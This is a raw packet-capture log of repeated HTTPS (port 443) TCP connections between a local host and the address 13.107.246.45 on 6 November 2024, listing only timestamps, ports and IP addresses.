                                              Nov 6, 2024 17:03:15.274565935 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.274590015 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.274604082 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.274610996 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.277542114 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.277590036 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.277713060 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.277884007 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.277904987 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.373047113 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.373097897 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.373167992 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.373246908 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.373296022 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.373594046 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.373620033 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.373632908 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.373639107 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.377048016 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.377099991 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.377207041 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.377443075 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.377455950 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.620132923 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.620764971 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.620800018 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.621237040 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.621243954 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.750782013 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.750950098 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.751019955 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.751194000 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.751214027 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.751226902 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.751234055 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.754210949 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.754249096 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.754318953 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.754535913 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.754547119 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.981139898 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.981981993 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.982017994 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.982476950 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.982487917 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.007447958 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.008104086 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.008136988 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.008537054 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.008543015 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.113559961 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.113631964 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.113699913 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.113959074 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.113981962 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.113995075 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.114001989 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.117060900 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.117110968 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.117177010 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.117341995 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.117357969 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.138951063 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.141637087 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.141671896 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.142512083 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.142527103 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.145418882 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.148062944 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.148161888 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.148210049 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.148230076 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.148245096 CET50143443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.148251057 CET4435014313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.151164055 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.151202917 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.151320934 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.151421070 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.151429892 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.277820110 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.277858973 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.277920008 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.277960062 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.277997017 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.278247118 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.278275967 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.278286934 CET50144443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.278291941 CET4435014413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.281255960 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.281311035 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.281433105 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.281601906 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.281620979 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.507095098 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.507667065 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.507705927 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.508136034 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.508141041 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.636259079 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.636338949 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.636409044 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.636624098 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.636646032 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.636658907 CET50145443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.636665106 CET4435014513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.640497923 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.640537024 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.640611887 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.640763998 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.640774012 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.859147072 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.859884977 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.859919071 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.860222101 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.860228062 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.889790058 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.890320063 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.890363932 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.891002893 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.891017914 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.989572048 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.989698887 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.989742994 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.989909887 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.989909887 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.990335941 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.990360022 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.990375996 CET50146443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.990381956 CET4435014613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.993526936 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.993570089 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:16.993680000 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.993885994 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:16.993901968 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.003843069 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.004338026 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.004357100 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.004848957 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.004854918 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.108376980 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.108453035 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.108664989 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.108752966 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.108773947 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.108792067 CET50147443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.108798027 CET4435014713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.111716986 CET50151443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.111756086 CET4435015113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.111838102 CET50151443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.112013102 CET50151443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.112029076 CET4435015113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.144033909 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.144136906 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.144325972 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.144397020 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.144412041 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.144426107 CET50148443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.144431114 CET4435014813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.159991980 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.160020113 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.160083055 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.160259962 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.160275936 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.386703968 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.387212038 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.387218952 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.387805939 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.387809038 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.519686937 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.519901037 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.519961119 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.520013094 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.520025969 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.520037889 CET50149443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.520044088 CET4435014913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.522902966 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.522947073 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.523046970 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.523298025 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.523319960 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.737898111 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.738342047 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.738379955 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.738792896 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.738801956 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.873424053 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.873496056 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.873559952 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.873733044 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.873758078 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.873769999 CET50150443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.873775959 CET4435015013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.876271963 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.876315117 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.876393080 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.876534939 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.876548052 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.887459993 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.887933016 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.887960911 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:17.888412952 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:17.888425112 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.018146038 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.018232107 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.018295050 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.018560886 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.018582106 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.018594027 CET50152443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.018599987 CET4435015213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.021662951 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.021708012 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.021837950 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.022011042 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.022025108 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.276369095 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.276932001 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.276961088 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.277496099 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.277503014 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.681255102 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.681334019 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.681397915 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.681592941 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.681613922 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.681624889 CET50153443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.681631088 CET4435015313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.684753895 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.684803009 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.684901953 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.685074091 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.685087919 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.808799028 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.809423923 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.809462070 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.809875965 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.809881926 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.810734034 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.810997963 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.811028004 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.811336994 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.811343908 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.939033985 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.939090967 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.939145088 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.939155102 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.939192057 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.939436913 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.939457893 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.939469099 CET50154443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.939475060 CET4435015413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.942459106 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.942501068 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.942583084 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.942847013 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.942857981 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.947803020 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.947870970 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.947922945 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.948020935 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.948044062 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.948059082 CET50155443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.948064089 CET4435015513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.950218916 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.950254917 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:18.950330973 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.950478077 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:18.950493097 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.414525986 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.415194035 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.415235996 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.415656090 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.415663958 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.544970989 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.545058966 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.545142889 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.545430899 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.545449972 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.545459032 CET50156443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.545464993 CET4435015613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.548993111 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.549042940 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.549124956 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.549331903 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.549345016 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.672796011 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.673470020 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.673497915 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.673929930 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.673935890 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.691514969 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.692146063 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.692173004 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.692581892 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.692586899 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.802628994 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.802704096 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.802768946 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.802995920 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.803018093 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.803034067 CET50157443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.803040981 CET4435015713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.806135893 CET50160443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.806180000 CET4435016013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.806255102 CET50160443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.806447983 CET50160443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.806459904 CET4435016013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.825937986 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.825994968 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.826113939 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.826150894 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.826417923 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.826428890 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.826446056 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.826450109 CET50158443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.826474905 CET4435015813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.829643965 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.829690933 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:19.829790115 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.830001116 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:19.830018044 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.285974026 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.286665916 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.286698103 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.287101030 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.287105083 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.415093899 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.415191889 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.415254116 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.415280104 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.415344954 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.415505886 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.415525913 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.415535927 CET50159443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.415541887 CET4435015913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.418174982 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.418242931 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.418322086 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.418467045 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.418482065 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.594765902 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.597460985 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.597496033 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.597913027 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.597918987 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.725003958 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.725117922 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.725240946 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.725461960 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.725482941 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.725493908 CET50161443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.725503922 CET4435016113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.728456020 CET50163443192.168.2.613.107.246.45
